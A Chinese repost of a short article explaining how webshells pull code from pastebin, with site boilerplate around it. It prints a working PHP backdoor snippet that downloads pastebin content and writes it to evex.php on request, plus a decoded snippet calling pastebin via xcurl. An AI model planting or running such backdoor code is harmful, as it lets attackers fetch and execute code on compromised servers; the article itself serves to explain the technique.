您的位置:首页 > 菜鸟学院 > 关于webshell的思路 - pastebin

关于webshell的思路 - pastebin

来源:互联网 | 时间:2015-01-21 19:49:09 | 阅读:110 |    | 分享到:

这两天某国外黑客写了一篇文章关于他发现的一种webshell中使用的手法,大体说说思路,原文就不翻译了,我懒。 

简单来说就是通过一个很简单的代码远程通过pastebin下载代码并且执行。 

if(array_keys($_GET)[0] == 'up'){ 
$content = file_get_contents("http:// pastebin . com/raw.php?i=JK5r7NyS"); 
if($content){unlink('evex.php'); 
$fh2 = fopen("evex.php", 'a'); 
fwrite($fh2,$content); 
fclose($fh2); 
}}else{print "test";}

pastebin是一个国外黑客,程序员经常分享资源,种子,代码的地方。经常从国外获取资源的同学应该会知道经常有黑客把自己黑来的数据库直接放上面进行共享。pastebin允许用户下载原始格式的代码文件,就是说黑客可以使用后门直接下载其他黑客共享的后门,或者给网站植入存在漏洞的网页。 

这是其中一个例子,代码已经经过解码。 

关于webshell的思路 - pastebin

还有一件事就是印度尼西亚某sb特地制作了pastebin编码器 

关于webshell的思路 - pastebin

上面的代码解码后的结果。 

function FathurFreakz($ct3){ 
xcurl('http:// pastebin.com/download.php?i='.code($ct3)); 

FathurFreakz(CODE);

总之要给出一个结论就是,像github pastebin这种充斥着数据和方便的功能的网站正在越来越多的被黑客利用。

好特网发布此文仅为传递信息,不代表好特网认同期限观点或证实其描述。

相关视频攻略

更多

扫二维码进入好特网手机版本!

扫二维码进入好特网微信公众号!

本站所有软件,都由网友上传,如有侵犯你的版权,请发邮件admin@haote.com

湘ICP备2022002427号-10 湘公网安备:43070202000427号© 2013~2024 haote.com 好特网